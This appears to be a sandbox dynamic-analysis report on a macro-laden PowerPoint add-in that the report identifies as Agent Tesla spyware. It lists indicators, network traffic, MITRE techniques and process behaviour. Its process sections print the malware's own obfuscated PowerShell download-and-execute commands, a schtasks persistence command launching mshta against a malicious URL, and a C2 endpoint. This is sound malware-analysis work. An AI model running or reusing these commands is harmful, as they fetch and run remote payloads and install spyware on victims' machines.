DYNAMIC ANALYSIS REPORT #2111629
MALICIOUS
Classifications: Injector Downloader Spyware
Threat Names: Agent Tesla v3 Mal/HTMLGen-A VB:Trojan.Valyria.4205
Verdict Reason: -
Sample Type Powerpoint Document
File Name 9_pdf.ppam
ID #838001
MD5 8338e340a6e070805616aee57601706d
SHA1 b47fb0ae8bdf11a58ebcebb514dfd3c8fd4b7826
SHA256 8e59758c7dba0ca744790644a23fa08c1e416e8f38ee221868b6560a2c915b51
File Size 8.80 KB
Report Created 2021-08-09 15:13 (UTC+2)
Target Environment win7_64_sp1_en_mso2016 | ms_office
X-Ray Vision for Malware - www.vmray.com 1 / 60
OVERVIEW

VMRay Threat Identifiers (26 rules, 52 matches)

Score | Category | Operation | Count | Classification

5/5 | System Modification | Modifies operating system directory | 1 | -
  - (Process #14) aspnet_compiler.exe creates file "C:\Windows\system32\drivers\etc\hosts" in the OS directory.

5/5 | YARA | Malicious content matched by YARA rules | 1 | Spyware
  - Rule "AgentTesla_StringDecryption_v3" from ruleset "Malware" has matched on a memory dump for (process #14) aspnet_compiler.exe.

4/5 | Obfuscation | Reads from memory of another process | 3 | -
  - (Process #6) powershell.exe reads from (process #14) aspnet_compiler.exe.
  - (Process #6) powershell.exe reads from (process #15) aspnet_compiler.exe.
  - (Process #6) powershell.exe reads from (process #16) aspnet_compiler.exe.

4/5 | Antivirus | Malicious content was detected by heuristic scan | 3 | -
  - Built-in AV detected a downloaded file as "VBS.Heur.Asthma.1.82A465E6.Gen".
  - Built-in AV detected a downloaded file as "VB:Trojan.Valyria.4205".
  - Built-in AV detected "VBS.Heur.Asthma.1.82A465E6.Gen" in the PCAP of the analysis.

4/5 | Injection | Writes into the memory of another process | 2 | Injector
  - (Process #6) powershell.exe modifies memory of (process #14) aspnet_compiler.exe.
  - (Process #6) powershell.exe modifies memory of (process #16) aspnet_compiler.exe.

4/5 | Injection | Modifies control flow of another process | 2 | -
  - (Process #6) powershell.exe alters context of (process #14) aspnet_compiler.exe.
  - (Process #6) powershell.exe alters context of (process #16) aspnet_compiler.exe.

4/5 | Execution | Document tries to create process | 1 | -
  - Document creates (process #3) mshta.exe.

4/5 | Reputation | Contacts known malicious URL | 4 | -
  - Reputation analysis labels the contacted URL "http://bukbukbukak.blogspot.com/p/9.html" as "Mal/HTMLGen-A".
  - Reputation analysis labels the URL "http://1230948%[email protected]/p/9.html" which was contacted by (process #13) mshta.exe as "Mal/HTMLGen-A".
  - Reputation analysis labels the URL "https://bukbukbukak.blogspot.com/p/9.html" which was contacted by (process #13) mshta.exe as "Mal/HTMLGen-A".
  - Reputation analysis labels the contacted URL "https://bukbukbukak.blogspot.com/js/cookienotice.js" as "Mal/HTMLGen-A".

4/5 | Reputation | Resolves known malicious domain | 1 | -
  - Reputation analysis labels the resolved domain "bukbukbukak.blogspot.com" as "Mal/HTMLGen-A".

4/5 | Task Scheduling | Schedules task | 1 | -
  - Schedules task for command "MsHtA", to be triggered by Time. Task has been rescheduled by the analyzer.

4/5 | Task Scheduling | Schedules task via schtasks | 2 | -
  - Schedules task """BlueStacksIUptad""" via the schtasks command line utility.
  - Schedules task "BlueStacksIUptad" via the schtasks command line utility.

4/5 | Network Connection | Performs DNS request | 4 | -
  - (Process #6) powershell.exe resolves host name "92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com" to IP "34.102.176.152".
  - (Process #6) powershell.exe resolves host name "35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com" to IP "34.102.176.152".
  - (Process #10) powershell.exe resolves host name "35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com" to IP "34.102.176.152".
  - (Process #10) powershell.exe resolves host name "www.google.com" to IP "172.217.23.100".

4/5 | Network Connection | Connects to remote host | 4 | -
  - (Process #6) powershell.exe opens an outgoing TCP connection to host "34.102.176.152:443".
  - (Process #10) powershell.exe opens an outgoing TCP connection to host "172.217.23.100:80".
  - (Process #10) powershell.exe opens an outgoing TCP connection to host "34.102.176.152:443".
  - (Process #14) aspnet_compiler.exe opens an outgoing TCP connection to host "180.214.239.67:80".

4/5 | Network Connection | Downloads file | 1 | Downloader
  - Downloads file via http from http://pki.goog/gsr1/gsr1.crt.

4/5 | Network Connection | Attempts to connect through HTTP | 4 | -
  - (Process #10) powershell.exe connects to "http://www.google.com/".
  - (Process #10) powershell.exe failed to connect to "http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRecgPDGLadxIgGIhCsvzDNI0n-EbyITWaDWe2KMgFy".
  - (Process #14) aspnet_compiler.exe connects to "http://180.214.239.67/k/p9i/inc/b61f0c2fdfd137.php".
  - (Process #13) mshta.exe failed to connect to "http://1230948%[email protected]/p/9.html".

4/5 | Network Connection | Attempts to connect through HTTPS | 8 | -
  - (Process #3) mshta.exe connects to "https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html".
  - (Process #3) mshta.exe connects to "https://www.bitly.com/ddwddwwkfwdwoooi".
  - (Process #3) mshta.exe connects to "https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Ffckusecurityresearchermotherfkrs.blogspot.com%2Fp%2F9_17.html&type=blog&bpli=1".
  - (Process #6) powershell.exe connects to "https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_38b5f8d731e148338a8c245338c3ed54.txt".
  - (Process #6) powershell.exe connects to "https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt".
  - (Process #10) powershell.exe connects to "https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt".
  - (Process #13) mshta.exe connects to "https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotUR... ...//www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/p/9.html%26type%3Dblog%26bpli%3D1&passive=true&go=true".
  - (Process #13) mshta.exe connects to "https://bukbukbukak.blogspot.com/p/9.html".

3/5 | Discovery | Enumerates running processes | 1 | -
  - (Process #6) powershell.exe enumerates running processes.

3/5 | Persistence | Installs system startup script or application | 1 | -
  - (Process #10) powershell.exe adds "c:\users\keecfmwgj\appdata\roaming\microsoft\windows\start menu\programs\startup\onedrive.vbs" to Windows startup folder.

2/5 | Hide Tracks | Writes an unusually large amount of data to the registry | 1 | -
  - (Process #13) mshta.exe hides 37094 bytes in "HKEY_CURRENT_USER\Software\cookerr".

2/5 | Discovery | Reads network adapter information | 1 | -
  - (Process #14) aspnet_compiler.exe reads the network adapters' addresses by API.

2/5 | Execution | Office macro uses an execute function | 1 | -
  - Office macro uses the shellexecute function.

2/5 | Execution | Executes macro on specific event | 1 | -
  - Executes macro automatically on target "document" and event "open".

2/5 | Execution | Creates suspicious COM object | 1 | -
  - Office macro creates suspicious Shell.Application COM object.

2/5 | Obfuscation | Document contains obfuscated macros | 1 | -
  - C:\Users\kEecfMwgj\Desktop\9_pdf.ppam contains an obfuscated macro.

2/5 | Defense Evasion | URL contains unusual backslashes | 1 | -
  - Extracted URL http://1230948%[email protected]/p/9.html\ does not use the standard URL syntax.

1/5 | Execution | Contains suspicious Office macro | 1 | -
  - Office document contains a suspicious VBA macro.

- | Trusted | Known clean file | 2 | -
  - A file which was only downloaded to memory is a known clean file.
  - File "C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\error[1]" is a known clean file.

- | Trusted | File has embedded known clean URL | 1 | -
  - Extracted URL "https://translate.google.de/?hl=de&tab=jT" is a known clean URL.
Mitre ATT&CK Matrix

Techniques shown in the matrix, grouped by the tactic column they appear under (reconstructed from the flattened layout; the Initial Access, Credential Access, Collection, Exfiltration and Impact columns are empty):

Execution: #T1064 Scripting; #T1053 Scheduled Task
Persistence: #T1060 Registry Run Keys / Startup Folder; #T1053 Scheduled Task
Privilege Escalation: #T1053 Scheduled Task
Defense Evasion: #T1112 Modify Registry; #T1064 Scripting
Discovery: #T1057 Process Discovery; #T1016 System Network Configuration Discovery
Lateral Movement: #T1105 Remote File Copy
Command and Control: #T1071 Standard Application Layer Protocol; #T1105 Remote File Copy; #T1032 Standard Cryptographic Protocol
Sample Information
ID #838001
MD5 8338e340a6e070805616aee57601706d
SHA1 b47fb0ae8bdf11a58ebcebb514dfd3c8fd4b7826
SHA256 8e59758c7dba0ca744790644a23fa08c1e416e8f38ee221868b6560a2c915b51
SSDeep 192:37Xq/ea9PRww1JU7YnRS3yLbKR8KbwJgnUY2:30eakIU0nRdnKbfUY2
File Name 9_pdf.ppam
File Size 8.80 KB
Sample Type Powerpoint Document
Has Macros yes

Analysis Information
Creation Time 2021-08-09 15:13 (UTC+2)
Analysis Duration 00:04:05
Termination Reason Timeout
Number of Monitored Processes 20
Execution Successful False
Reputation Enabled
WHOIS Enabled
Built-in AV Enabled
Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of AV Matches 1
YARA Enabled
YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of YARA Matches 1

Screenshots: truncated
NETWORK

General
32.23 KB total sent
2018.46 KB total received
2 ports: 80, 443
11 contacted IP addresses
74 URLs extracted
31 files downloaded
0 malicious hosts detected
10 DNS requests for 8 domains
1 nameserver contacted
0 total requests returned errors
19 URLs contacted, 9 servers
14 sessions, 32.23 KB sent, 2018.46 KB received

HTTP Requests
In every row the Dest. IP, Dest. Port and Status Code columns carry no value, Response Size is 0 bytes and Verdict is NA, so only Method and URL are listed; "-" means the report shows no method.

Method | URL
- | http://1230948%[email protected]/p/9.html\
- | http://1230948%[email protected]/p/9.html
GET | http://bitly.com/ddwddwwkfwdwoooi
GET | http://pki.goog/gsr1/gsr1.crt
GET | http://bukbukbukak.blogspot.com/p/9.html
GET | http://www.google.com/
GET | http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRecgPDGLadxIgGIhCsvzDNI0n-EbyITWaDWe2KMgFy
POST | http://180.214.239.67/k/p9i/inc/b61f0c2fdfd137.php
GET | //www.google.com/policies/terms/
GET | //support.google.com/websearch/answer/86640
- | https://www.bitly.com/ddwddwwkfwdwoooi
- | https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_38b5f8d731e148338a8c245338c3ed54.txt
- | https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt
- | https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt
- | https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_02df7f9ae2d74130872a6c4165f7ed60.txt
GET | https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html
GET | https://fckusecurityresearchermotherfkrs.blogspot.com/js/cookienotice.js
GET | https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Ffckusecurityresearchermotherfkrs.blogspot.com%2Fp%2F9_17.html&type=blog&bpli=1
GET | https://fonts.googleapis.com/css?family=Open+Sans:300
GET | https://fonts.googleapis.com/css?lang=de&family=Product+Sans|Roboto:400,700
GET | https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/... ...s://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/p/9.html%26type%3Dblog%26bpli%3D1&passive=true&go=true
GET | https://bukbukbukak.blogspot.com/p/9.html
GET | https://bukbukbukak.blogspot.com/js/cookienotice.js
GET | https://www.google.com/recaptcha/api.js
GET | https://www.blogger.com/static/v1/widgets/3822632116-css_bundle_v2.css
GET | https://fckusecurityresearchermotherfkrs.blogspot.com/favicon.ico
GET | https://www.blogger.com/dyn-css/authorization.css?targetBlogID=644545533916229546&zx=551455ad-7f93-402f-89a1-d9e43c6794f5
GET | https://fckusecurityresearchermotherfkrs.blogspot.com/
GET | https://www.blogger.com/blogin.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&type=blog
GET | https://www.blogger.com/static/v1/widgets/2583860411-widgets.js
GET | https://www.blogger.com/age-verification.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&from=APq4FmCi5NBs1f3axOfaSfoosWI5gDvOWPuVdwMn7HZMV1Hu00EksHZcLZ8-Uz03byZEC6CvHoy-fLnoyhgJ3-myRV-oRFV6mg
GET | https://www.blogger.com
GET | https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbukbukbukak.blogspot.com%2Fp%2F9.html&type=blog&bpli=1
GET | https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
GET | https://www.google.de/intl/de/about/products?tab=jh
GET | https://myaccount.google.com/?utm_source=OGB&tab=jk&utm_medium=app
GET | https://www.google.de/webhp?tab=jw
GET | https://maps.google.de/maps?hl=de&tab=jl
GET | https://www.youtube.com/?gl=DE&tab=j1
GET | https://play.google.com/?hl=de&tab=j8
GET | https://news.google.com/?tab=jn
GET | https://mail.google.com/mail/?tab=jm
GET | https://meet.google.com/?hs=197
GET | https://chat.google.com/
GET | https://contacts.google.com/?hl=de&tab=jC
GET | https://drive.google.com/?tab=jo
GET | https://calendar.google.com/calendar?tab=jc
GET | https://translate.google.de/?hl=de&tab=jT
GET | https://photos.google.com/?tab=jq&pageId=none
GET | https://duo.google.com/?usp=duo_ald
GET | https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launcher&utm_campaign=desktop-app-launcher&utm_content=chrome-logo&utm_keyword=CHZO
GET | https://www.google.de/shopping?hl=de&source=og&tab=jf
GET | https://docs.google.com/document/?usp=docs_alc
GET | https://docs.google.com/spreadsheets/?usp=sheets_alc
GET | https://docs.google.com/presentation/?usp=slides_alc
GET | https://books.google.de/?hl=de&tab=jp
GET | https://www.blogger.com/?tab=jj
GET | https://hangouts.google.com/
GET | https://keep.google.com/
GET | https://jamboard.google.com/?usp=jam_ald
GET | https://earth.google.com/web/
GET | https://www.google.de/save
GET | https://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral
GET | https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1!o2
GET | https://podcasts.google.com/
GET | https://stadia.google.com/
GET | https://www.google.com/travel/?dest_src=al
GET | https://docs.google.com/forms/?usp=forms_alc
GET | https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogger.g&ec=GAZAHg
GET | https://www.blogger.com/go/helpcenter
GET | https://www.blogger.com/go/discuss
GET | https://www.blogger.com/go/tutorials
GET | https://www.blogger.com/go/buzz
GET | https://www.blogger.com/go/devapi
GET | https://www.blogger.com/go/devforum
GET | https://www.blogger.com/go/terms
GET | https://www.blogger.com/go/privacy
GET | https://www.blogger.com/go/contentpolicy
GET | https://www.google.de/contact/impressum.html
GET | https://www.google-analytics.com/analytics.js
GET | https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
GET | https://bukbukbukak.blogspot.com/favicon.ico
GET | https://www.blogger.com/dyn-css/authorization.css?targetBlogID=3230375044160936909&zx=74bb4738-53be-4905-9fa3-25325b11a73a
GET | https://bukbukbukak.blogspot.com/
GET | https://www.blogger.com/blogin.g?blogspotURL=https://bukbukbukak.blogspot.com/p/9.html&type=blog

DNS Requests

Type | Hostname | Response Code | Resolved IPs | CNames | Verdict
A | www.bitly.com, bitly.com | NoError | 67.199.248.14, 67.199.248.15 | bitly.com | NA
A | fckusecurityresearchermotherfkrs.blogspot.com, blogspot.l.googleusercontent.com | NoError | 216.58.212.161 | blogspot.l.googleusercontent.com | NA
A | pki.goog | NoError | 216.239.32.29 | - | NA
A | fonts.googleapis.com | NoError | 142.250.74.202 | - | NA
A | 92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com, media-router.wixstatic.com, gcp.media-router.wixstatic.com | NoError | 34.102.176.152 | media-router.wixstatic.com, gcp.media-router.wixstatic.com | NA
A | 35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com, media-router.wixstatic.com, gcp.media-router.wixstatic.com | NoError | 34.102.176.152 | media-router.wixstatic.com, gcp.media-router.wixstatic.com | NA
A | bukbukbukak.blogspot.com, blogspot.l.googleusercontent.com | NoError | 216.58.212.161 | blogspot.l.googleusercontent.com | NA
- | 35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com | - | 34.102.176.152 | - | NA
- | www.google.com | - | 172.217.23.100 | - | NA
BEHAVIOR

Process Graph

Nodes as drawn in the graph (process number, image, and the edge type by which the node is attached):

  #1  powerpnt.exe          Sample Start
  #2  outlook.exe           RPC Server
  #3  mshta.exe             Child Process
  #4  svchost.exe           RPC Server
  #5  powershell.exe        Child Process
  #6  powershell.exe        Child Process
  #10 powershell.exe        Child Process
  #7  wmiprvse.exe          RPC Server
  #12 taskeng.exe           Child Process
  #11 schtasks.exe          Child Process
  #14 aspnet_compiler.exe   Child Process; Modify Memory and Modify Control Flow edges from #6
  #15 aspnet_compiler.exe   Child Process
  #16 aspnet_compiler.exe   Child Process; Modify Memory and Modify Control Flow edges from #6
  #21 powershell.exe        Child Process
  #18 wscript.exe           Child Process
  #22 wscript.exe           Child Process
  #13 mshta.exe             Child Process
  #19 powershell.exe        Child Process
  #20 schtasks.exe          Child Process
  #23 powershell.exe        Child Process

Parent relationships confirmed by the PID / Parent PID fields in the per-process sections below: #3 mshta.exe (PID 3720) is a child of #2 outlook.exe (PID 3616); #5, #6 and #10 powershell.exe are children of #3; #11 schtasks.exe is a child of #5; #14 aspnet_compiler.exe is a child of #6; #12 taskeng.exe is a child of #4 svchost.exe (PID 816); #13 mshta.exe is a child of #12 taskeng.exe (PID 2808), which is the scheduled task firing. The Modify Memory and Modify Control Flow edges from #6 to #14 and #16 are the injection listed under the Injection threat identifiers.
Process #1: powerpnt.exe
ID 1
File Name c:\program files (x86)\microsoft office\root\office16\powerpnt.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE"
Initial Working Directory C:\Users\kEecfMwgj\Desktop\
Monitor Start Time Start Time: 33976, Reason: Analysis Target
Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout
Monitor duration 245.28s
Return Code Unknown
PID 3344
Parent PID 1124
Bitness 32 Bit
Process #2: outlook.exe
ID 2
File Name c:\program files (x86)\microsoft office\root\office16\outlook.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 51813, Reason: RPC Server
Unmonitor End Time End Time: 105867, Reason: Terminated
Monitor duration 54.05s
Return Code 0
PID 3616
Parent PID 584
Bitness 32 Bit
Process #3: mshta.exe
ID 3
File Name c:\windows\syswow64\mshta.exe
Command Line C:\Windows\SysWOW64\mshta.exe https://www.bitly.com/ddwddwwkfwdwoooi
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 85089, Reason: Child Process
Unmonitor End Time End Time: 141359, Reason: Terminated
Monitor duration 56.27s
Return Code 0
PID 3720
Parent PID 3616
Bitness 32 Bit

Dropped Files (25)
File Name | File Size | SHA256 (the YARA Match column is empty for every entry; "-" as file name means the content was only downloaded to memory)
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot | 15.60 KB | 01e698231e9d93dceaa9a97f4e5cdbdbceefbea67d4e39acd0391e1cae00889b
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN[1].eot | 152.93 KB | 22f8356c61b22b8a6506465087d48d831303e10c66bd3ced965f6a32a7302dde
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\pxiDypQkot1TnFhsFMOfGShVF9eK[1].eot | 27.95 KB | f0da44c78fae13b0c7078626f17f4b5b60ef9e396d6cfc5cec5304d17c358d1a
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\KFOmCnqEu92Fr1Mu4mxO[1].eot | 17.40 KB | be869a73a160440e8bfc5c7d84a907febd61075d920d51c7d0097d7295c865cd
- | 32.91 KB | dc82cadcaad72e4f7aa996a149126ecb15e652606e55a12efcb994a16f5159a9
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\cookienotice[1].js | 6.36 KB | 068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\3822632116-css_bundle_v2[1].css | 36.12 KB | 224d95cce08108610c46ef4134793dbdd619e43e90e9d9cf42716a08f45222f9
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\3046902713-ieretrofit[1].js | 26.01 KB | 5993c37fe8dfca6e242e6e5b7c48ae99c9d41a8fe3d209dd38a0d161516b519a
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\2583860411-widgets[1].js | 147.02 KB | 9d358297f944faf6cfd24e3069ef42fa2aaef6fe243b61389a9a02c8d6de9a50
- | 149.99 KB | 25a34aed1f1f78b098376e9e7b6785fa7eaf3d9281192ff5e3915e6083ec8450
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\3101730221-analytics_autotrack[1].js | 24.70 KB | 21cc4dc6c3c01b84c808004173f42e3ed1b4f09551a10d69b4cec7394a1590e6
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\authorization[1].css | 1 bytes | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\281434096-static_pages[1].css | 3.72 KB | 0fc52ef116f03fd95f9857856f1e2cbdfa2cacc398e066db0d8d5481739bc2d7
- | 1.13 KB | cbad27c35fbc84e2da4280476adeb197566db2750b8b4a79eb7e872db8d8acb7
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\css[1].txt | 172 bytes | 3e6e1c58507746b01dd0f74cd9d40c885ffaea0cc025eb4f27c4c947916f2068
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\css[1].txt | 402 bytes | 49d0d1473181447caad524188bfcb1344b20a4ffa42bb0b5ff7695e379ae3b79
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\maia[1].css | 42.48 KB | 8684a32d1a10d050a26fc33192edf427a5f0c6874c590a68d77ae6e0d186bd8a
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\analytics[1].js | 48.23 KB | e61660c659c426e45bce2937dddb01af6b550502a2904546575c1ec2ba1121dd
- | 95 bytes | 0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd
- | 403 bytes | ecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\error[1] | 3.17 KB | 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
- | 97 bytes | 0b113b5594ea4cfeb6346d6f997c2dd8a1623037a855b9f896093ec1e1426811
- | 195 bytes | bf0a747e7005ace88140897c4c166749eaffcd9f96286c431fa3409709a0b344
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\error[1] | 4.12 KB | 966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\warning[1] | 1.04 KB | 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9

Host Behavior (Type: Count)
System 312, Module 190, File 122, Environment 2, Registry 184, (unnamed) 5, Keyboard 2, Mutex 1, Window 24, COM 66, (unnamed) 2, Process 1

Network Behavior (Type: Count)
HTTPS 3, TCP 4
Process #4: svchost.exe
ID 4
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 92649, Reason: RPC Server
Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout
Monitor duration 186.60s
Return Code Unknown
PID 816
Parent PID 464
Bitness 64 Bit
Process #5: powershell.exe
ID 5
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /create /sc MINUTE /mo 80 /tn ""BlueStacksIUptad"" /F /tr ""\""MsHtA http://1230948%[email protected]/p/9.html\""
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 107348, Reason: Child Process
Unmonitor End Time End Time: 171684, Reason: Terminated
Monitor duration 64.34s
Return Code 0
PID 3808
Parent PID 3720
Bitness 32 Bit

Host Behavior (Type: Count)
System 4, Module 3, File 23, Environment 14, Registry 2, Process 1, (unnamed) 13
Process #6: powershell.exe
ID 6
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Cre... ...-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt').GetResponse().GetResponseStream()).ReadToend());
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 107858, Reason: Child Process
Unmonitor End Time End Time: 194728, Reason: Terminated
Monitor duration 86.87s
Return Code 0
PID 3828
Parent PID 3720
Bitness 32 Bit

Host Behavior (Type: Count)
System 38, Module 12, File 535, Environment 38, Registry 94, Process 6, (unnamed) 38, (unnamed) 7, (unnamed) 16

Network Behavior (Type: Count)
HTTPS 2, DNS 2, TCP 1
Process #7: wmiprvse.exe
ID 7
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 110365, Reason: RPC Server
Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout
Monitor duration 168.89s
Return Code Unknown
PID 2812
Parent PID 584
Bitness 64 Bit
Process #10: powershell.exe
ID 10
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`<^_^>t`.W`e'.Replace('<^_^>','w-Object Ne');$alosh='b... ...9a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 120148, Reason: Child Process
Unmonitor End Time End Time: 245801, Reason: Terminated
Monitor duration 125.65s
Return Code 0
PID 3928
Parent PID 3720
Bitness 32 Bit

Dropped Files (7)
File Name | File Size | SHA256 (the YARA Match column is empty for every entry)
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | 8.99 KB | 1adc32fffc15aee5a186eb7a6fd12a09c377c83665289589c94058df73a9de19
C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.vbs | 398 bytes | 61e40c1da7fd6964108819d35ac2641ec11f80d18f81b3fdc361612e6060bf8c
C:\Users\Public\alosh.ps1 | 12.46 KB | 049d229c448e844e1e6d7e30478d986f549c05471764db32ee349f494c3e1314
C:\Users\Public\run.ps1 | 559 bytes | 76e20cb044db745f7065bff4d5bb09c16d83ca1d17f615fa2e41e1d68f1cde17
C:\Users\Public\test.ps1 | 374 bytes | 7993a1c616e7d70074f3508ee8fb3d5b709f2a6894cd5a3fceff1630503a6513
C:\Users\Public\vb.vbs | 495 bytes | 03b7e264915f482ca3499e842e8e71a2186c67f067adbd222059302da7b320f7
C:\Users\Public\Chrome.vbs | 236 bytes | febb4719018181cf1dc5ed66812439e8c0a8b982a18c2e77354986804b71c1fa

Host Behavior (Type: Count)
System 71, Module 13, File 3092, Environment 161, Registry 136, (unnamed) 58, Process 2, Keyboard 1

Network Behavior (Type: Count)
HTTP 2, HTTPS 1, DNS 3, TCP 2
Process #11: schtasks.exe
ID 11
File Name c:\windows\syswow64\schtasks.exe
Command Line "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 80 /tn BlueStacksIUptad /F /tr "MsHtA http://1230948%[email protected]/p/9.html"
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 168218, Reason: Child Process
Unmonitor End Time End Time: 170674, Reason: Terminated
Monitor duration 2.46s
Return Code 0
PID 3284
Parent PID 3808
Bitness 32 Bit

Host Behavior (Type: Count)
System 5, Module 9, COM 1, User 1, File 5
Process #12: taskeng.exe
ID 12
File Name c:\windows\system32\taskeng.exe
